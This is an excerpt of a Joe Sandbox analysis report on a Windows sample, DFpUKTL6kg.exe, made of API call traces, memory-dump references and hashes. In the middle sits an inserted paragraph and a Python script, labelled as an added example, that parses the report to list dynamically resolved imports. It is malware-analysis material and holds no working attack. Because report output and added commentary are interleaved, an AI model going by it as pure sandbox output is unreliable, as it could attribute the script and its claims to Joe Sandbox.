                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00A0CCF1
                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A0CD05
                  • SetDlgItemTextW.USER32(?,00000068), ref: 00A0CD14
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: RENAMEDLG
                  • API String ID: 445417207-3299779563
                  • Opcode ID: 92d2fb40987e5a9b2d1cc1ff4ff4418eb2418468ec84b65bd3c56d282b13ff93
                  • Instruction ID: ba298fbb20738e0ab13d13e0bde7c9c558dea4c569f2deea012137f849d714aa
                  • Opcode Fuzzy Hash: 92d2fb40987e5a9b2d1cc1ff4ff4418eb2418468ec84b65bd3c56d282b13ff93
                  • Instruction Fuzzy Hash: A00128332853187FE111CFA4FD08F6B3B6CFB9B712F100610F346A20E0C6A2591687A5
                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A17573,00000000,?,00A17513,00000000,00A2BAD8,0000000C,00A1766A,00000000,00000002), ref: 00A175E2
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A175F5
                  • FreeLibrary.KERNEL32(00000000,?,?,?,00A17573,00000000,?,00A17513,00000000,00A2BAD8,0000000C,00A1766A,00000000,00000002), ref: 00A17618
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProc
                  • String ID: CorExitProcess$mscoree.dll
                  • API String ID: 4061214504-1276376045
                  • Opcode ID: 8fdbe0e1fdba6f381dd47aa3c37ea4b28c63113c785b75dc04e538b4af36ea06
                  • Instruction ID: 13f03d4aa1f14e34c4a547d0bd22b9d578665f6699120da71a60a0e1eaa549cc
                  • Opcode Fuzzy Hash: 8fdbe0e1fdba6f381dd47aa3c37ea4b28c63113c785b75dc04e538b4af36ea06
                  • Instruction Fuzzy Hash: 05F04F31A0861CBBDF25DBA8DD09BEDBFB9EF04711F004178F805A2150DB748A82CB94
                  APIs
                    • Part of subcall function 00A00085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A000A0
                    • Part of subcall function 00A00085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009FEB86,Crypt32.dll,00000000,009FEC0A,?,?,009FEBEC,?,?,?), ref: 00A000C2
                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 009FEB92
                  • GetProcAddress.KERNEL32(00A381C0,CryptUnprotectMemory), ref: 009FEBA2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                  • API String ID: 2141747552-1753850145
                  • Opcode ID: c6d35e920a5db0ac8aa09cc96af6a87cf4d71e23b77e19fbf7e0d1a716a287a0
                  • Instruction ID: 7f1def3aee630c76ee930a62d3c862ac6f8d86f0839f7b8106895aab6dd693bd
                  • Opcode Fuzzy Hash: c6d35e920a5db0ac8aa09cc96af6a87cf4d71e23b77e19fbf7e0d1a716a287a0
                  • Instruction Fuzzy Hash: 95E04F72505751AECF309F7DA818B52BAE46B17B11F008C2DE4D6D3590D6F8D5818B60
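The two listings above (GetModuleHandleExW followed by GetProcAddress for CorExitProcess in mscoree.dll, which is the MSVC CRT's normal exit path, and LoadLibraryW followed by GetProcAddress for CryptProtectMemory and CryptUnprotectMemory in Crypt32.dll) both resolve imports at run time, so these symbols are absent from the PE import table and surface in the report only as string arguments Joe Sandbox recovered from the call sites. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses "APIs" entries written in the layout shown above and pairs each GetProcAddress with the library loaded earlier in the same function block. The embedded sample text is constructed from the entries above, and the regular expression, the loader name list and the function names are this example's own assumptions about the report format.

```python
"""Pull dynamically resolved imports out of Joe Sandbox 'APIs' listings.

Added example, not part of the Joe Sandbox report. SAMPLE is constructed
from the shape of the report's entries (bullet, API.MODULE(args), ref:
address); CALL_RE and LOADERS are this script's assumptions about that
layout, not a documented Joe Sandbox format.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: two function blocks in the report's layout.
SAMPLE = """\
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A17573,00000000,?,00A17513,00000000,00A2BAD8,0000000C,00A1766A,00000000,00000002), ref: 00A175E2
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A175F5
• FreeLibrary.KERNEL32(00000000,?,?,?,00A17573,00000000,?,00A17513,00000000,00A2BAD8,0000000C,00A1766A,00000000,00000002), ref: 00A17618
Strings
APIs
  • Part of subcall function 00A00085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A000A0
  • Part of subcall function 00A00085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009FEB86,Crypt32.dll,00000000,009FEC0A,?,?,009FEBEC,?,?,?), ref: 00A000C2
• GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 009FEB92
• GetProcAddress.KERNEL32(00A381C0,CryptUnprotectMemory), ref: 009FEBA2
Strings
"""

# One call entry: optional "Part of subcall function XXXXXXXX:" prefix,
# then API.MODULE(args), then the call-site address.
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
HEX_RE = re.compile(r"^[0-9A-F]{8}$")
# APIs that bring a module into scope for a later GetProcAddress.
LOADERS = {
    "LoadLibraryW", "LoadLibraryA", "LoadLibraryExW", "LoadLibraryExA",
    "GetModuleHandleW", "GetModuleHandleA", "GetModuleHandleExW",
}


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str] = None


@dataclass
class FunctionBlock:
    calls: List[Call] = field(default_factory=list)


def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split the listing on 'APIs' headers and parse each call entry beneath them."""
    blocks: List[FunctionBlock] = []
    current: Optional[FunctionBlock] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        m = CALL_RE.search(stripped)
        if m and current is not None:
            args = [a.strip() for a in m["args"].split(",")]
            current.calls.append(Call(m["api"], m["module"], args, m["ref"], m["sub"]))
    return blocks


def symbolic_args(call: Call) -> List[str]:
    """Arguments that are neither unknown ('?') nor a raw 8-digit address: recovered strings."""
    return [a for a in call.args if a and a != "?" and not HEX_RE.match(a)]


def dynamic_imports(blocks: List[FunctionBlock]) -> List[Tuple[Optional[str], str, str]]:
    """Return (library, symbol, call-site) for every GetProcAddress.

    The library is taken from the nearest preceding loader call in the same
    block; None means no loader with a recoverable DLL name was seen.
    """
    found: List[Tuple[Optional[str], str, str]] = []
    for block in blocks:
        library: Optional[str] = None
        for call in block.calls:
            if call.api in LOADERS:
                dlls = [a for a in symbolic_args(call) if a.lower().endswith(".dll")]
                if dlls:
                    library = dlls[0]
            elif call.api == "GetProcAddress":
                names = symbolic_args(call)
                if names:
                    found.append((library, names[-1], call.ref))
    return found


if __name__ == "__main__":
    for library, symbol, ref in dynamic_imports(parse_blocks(SAMPLE)):
        print(f"{ref}: {library or '<unknown module>'}!{symbol}")
```

Run against a whole report, the output is the list of late-bound APIs to compare against the static import table; a CryptProtectMemory/CryptUnprotectMemory pair is what an archive stub uses to keep a password in memory encrypted between uses, while names like VirtualAllocEx or WriteProcessMemory resolved this way would be worth a closer look.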
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: 45606e32d7371be60a3d17b497886e5de3a285a783f8a3e9a1fc6a900ed56b7b
                  • Instruction ID: a366e619ca05b4604f990df342c9fe91129f723c43d81e2ca08d5c5881d2eed7
                  • Opcode Fuzzy Hash: 45606e32d7371be60a3d17b497886e5de3a285a783f8a3e9a1fc6a900ed56b7b
                  • Instruction Fuzzy Hash: BA41B232A003049FDB24DF78C981AAEB7F6EF85714F1545A9E515EB281DB31AD42CB80
                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 00A1B619
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A1B63C
                    • Part of subcall function 00A18518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A1C13D,00000000,?,00A167E2,?,00000008,?,00A189AD,?,?,?), ref: 00A1854A
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A1B662
                  • _free.LIBCMT ref: 00A1B675
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A1B684
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                  • String ID:
                  • API String ID: 336800556-0
                  • Opcode ID: a8c9af7dd8740cab74b275b279c61396a1407082cff7c6aa74ca08df720c9a0c
                  • Instruction ID: b58e6e0610bfe3ee3af3a26a91e0a56bde8b43cb6dbb873743d36ce703c6bd96
                  • Opcode Fuzzy Hash: a8c9af7dd8740cab74b275b279c61396a1407082cff7c6aa74ca08df720c9a0c
                  • Instruction Fuzzy Hash: 97018473611215BF673157BA6C8CCFB6A6EDEE7BA03150229B955C3110DF748D4292B0
                  APIs
                  • GetLastError.KERNEL32(?,?,?,00A1895F,00A185FB,?,00A18FD3,00000001,00000364,?,00A13713,00000050,?,00A30EE8,00000200), ref: 00A1902E
                  • _free.LIBCMT ref: 00A19063
                  • _free.LIBCMT ref: 00A1908A
                  • SetLastError.KERNEL32(00000000,?,00A30EE8,00000200), ref: 00A19097
                  • SetLastError.KERNEL32(00000000,?,00A30EE8,00000200), ref: 00A190A0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ErrorLast$_free
                  • String ID:
                  • API String ID: 3170660625-0
                  • Opcode ID: 47f756e4cb79108a9ebb241621fb38360d574d7c53a6c149ff626f3122ece9b1
                  • Instruction ID: dff80f35dcce93808e34cde45d027f1c5a2e7e91e9efd1d3c3f2c2bb03134d95
                  • Opcode Fuzzy Hash: 47f756e4cb79108a9ebb241621fb38360d574d7c53a6c149ff626f3122ece9b1
                  • Instruction Fuzzy Hash: 66017D32205B006B8331A3B86D95DFB262F9BD93713240138F41A93251EF28CCC3D020
                  APIs
                    • Part of subcall function 00A00A41: ResetEvent.KERNEL32(?), ref: 00A00A53
                    • Part of subcall function 00A00A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00A00A67
                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00A0078F
                  • CloseHandle.KERNEL32(?,?), ref: 00A007A9
                  • DeleteCriticalSection.KERNEL32(?), ref: 00A007C2
                  • CloseHandle.KERNEL32(?), ref: 00A007CE
                  • CloseHandle.KERNEL32(?), ref: 00A007DA
                    • Part of subcall function 00A0084E: WaitForSingleObject.KERNEL32(?,000000FF,00A00A78,?), ref: 00A00854
                    • Part of subcall function 00A0084E: GetLastError.KERNEL32(?), ref: 00A00860
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                  • String ID:
                  • API String ID: 1868215902-0
                  • Opcode ID: 56a0779edf21c7ecd5cf602f76fd9ab617e9d87e3ddbd07a745fded58d7d0005
                  • Instruction ID: ec4e2606afd5af73dd6f12f0bcecb20fe1d4cb20f49beeccc9578f1f6d49be22
                  • Opcode Fuzzy Hash: 56a0779edf21c7ecd5cf602f76fd9ab617e9d87e3ddbd07a745fded58d7d0005
                  • Instruction Fuzzy Hash: 3E01B972544708EFCB31DB69ED84FD6BBE9FB45710F000529F19A421A0CB796646CB60
                  APIs
                  • _free.LIBCMT ref: 00A1BF28
                    • Part of subcall function 00A184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?), ref: 00A184F4
                    • Part of subcall function 00A184DE: GetLastError.KERNEL32(?,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?,?), ref: 00A18506
                  • _free.LIBCMT ref: 00A1BF3A
                  • _free.LIBCMT ref: 00A1BF4C
                  • _free.LIBCMT ref: 00A1BF5E
                  • _free.LIBCMT ref: 00A1BF70
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 30583986c70c958c435b1efe35885a62a91d313f46579ab2b437ae520febb8fb
                  • Instruction ID: b7a364e1898a8a5c38e65ee0909a52354914d1d34e4f723d2ffcf57adf59ea2b
                  • Opcode Fuzzy Hash: 30583986c70c958c435b1efe35885a62a91d313f46579ab2b437ae520febb8fb
                  • Instruction Fuzzy Hash: C2F01D32518201AB8630EBA8EF86CAA73E9BB147107648919F048D7914CF34FCC38A64
                  APIs
                  • _free.LIBCMT ref: 00A1807E
                    • Part of subcall function 00A184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?), ref: 00A184F4
                    • Part of subcall function 00A184DE: GetLastError.KERNEL32(?,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?,?), ref: 00A18506
                  • _free.LIBCMT ref: 00A18090
                  • _free.LIBCMT ref: 00A180A3
                  • _free.LIBCMT ref: 00A180B4
                  • _free.LIBCMT ref: 00A180C5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: aa12d1bc6c27db090dbe35d6c9e8343f59b155e0c0af3f342924877806e87d4a
                  • Instruction ID: 0e36372d198154c7fa9d61899cefff5dd2876fb98fabc7483f3b4b8ed9375557
                  • Opcode Fuzzy Hash: aa12d1bc6c27db090dbe35d6c9e8343f59b155e0c0af3f342924877806e87d4a
                  • Instruction Fuzzy Hash: B0F03A74801325AB8721EF99BD015A93BA5F7247227084A2AF40497E74CF3908D39FC1
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\DFpUKTL6kg.exe,00000104), ref: 00A176FD
                  • _free.LIBCMT ref: 00A177C8
                  • _free.LIBCMT ref: 00A177D2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _free$FileModuleName
                  • String ID: C:\Users\user\Desktop\DFpUKTL6kg.exe
                  • API String ID: 2506810119-349794724
                  • Opcode ID: 3099efcc2d46a3b315dcab00643dc85c589bea01cda1ccf5c32309f7b76e3a71
                  • Instruction ID: 3ff3bb9b5e090bdcd9867e84165488ae518c4f971230440c9ba7ecfa2ea728cf
                  • Opcode Fuzzy Hash: 3099efcc2d46a3b315dcab00643dc85c589bea01cda1ccf5c32309f7b76e3a71
                  • Instruction Fuzzy Hash: 83317271A04318AFDB21DF99DD81EEEBBFCEB95710F144166F80497651DA704E81CB90
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F7579
                    • Part of subcall function 009F3B3D: __EH_prolog.LIBCMT ref: 009F3B42
                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 009F7640
                    • Part of subcall function 009F7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 009F7C04
                    • Part of subcall function 009F7BF5: GetLastError.KERNEL32 ref: 009F7C4A
                    • Part of subcall function 009F7BF5: CloseHandle.KERNEL32(?), ref: 009F7C59
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                  • API String ID: 3813983858-639343689
                  • Opcode ID: 2bb64e80e5cad76d00811ac618ce2f9b4bf9f30c927fa55fce64fb0f4129d353
                  • Instruction ID: aa987ff44810cf030e734625d58f7eacf351898773d48eda0f3287d3f2a32a92
                  • Opcode Fuzzy Hash: 2bb64e80e5cad76d00811ac618ce2f9b4bf9f30c927fa55fce64fb0f4129d353
                  • Instruction Fuzzy Hash: BC31BE71A0824CAEDF20EBE8ED01FFEBB68AF55314F004069F645E7182DB704A45CBA1
                  APIs
                    • Part of subcall function 009F130B: GetDlgItem.USER32(00000000,00003021), ref: 009F134F
                    • Part of subcall function 009F130B: SetWindowTextW.USER32(00000000,00A235B4), ref: 009F1365
                  • EndDialog.USER32(?,00000001), ref: 00A0A4B8
                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00A0A4CD
                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A0A4E2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: ASKNEXTVOL
                  • API String ID: 445417207-3402441367
                  • Opcode ID: 9365d4bec4439a640254b66a595905caf3652256320d79a812efdb464d72a286
                  • Instruction ID: b0ec28a6c28f3cea008de3f4922d90920663144d9d82ccb9c208dda225c7a29f
                  • Opcode Fuzzy Hash: 9365d4bec4439a640254b66a595905caf3652256320d79a812efdb464d72a286
                  • Instruction Fuzzy Hash: F6119036244318AFD621DFA8ED49F6A37A9FB9B701F140114F3419B0E0C7A39902D766
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: __fprintf_l_strncpy
                  • String ID: $%s$@%s
                  • API String ID: 1857242416-834177443
                  • Opcode ID: 059f9953e1dd495528bf3fe0e184742a70e8332c5b488250ad4e83b2beb5c9ee
                  • Instruction ID: ab9e3901ed5d5ff576ce34fa07111d020433cc7cfda210900db2705d88fc83dd
                  • Opcode Fuzzy Hash: 059f9953e1dd495528bf3fe0e184742a70e8332c5b488250ad4e83b2beb5c9ee
                  • Instruction Fuzzy Hash: C721A13240120CAAEF20DFA4CD06FEE7BADAF05300F040522FB2096192E375DA95DB91
                  APIs
                    • Part of subcall function 009F130B: GetDlgItem.USER32(00000000,00003021), ref: 009F134F
                    • Part of subcall function 009F130B: SetWindowTextW.USER32(00000000,00A235B4), ref: 009F1365
                  • EndDialog.USER32(?,00000001), ref: 00A0A9DE
                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00A0A9F6
                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 00A0AA24
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
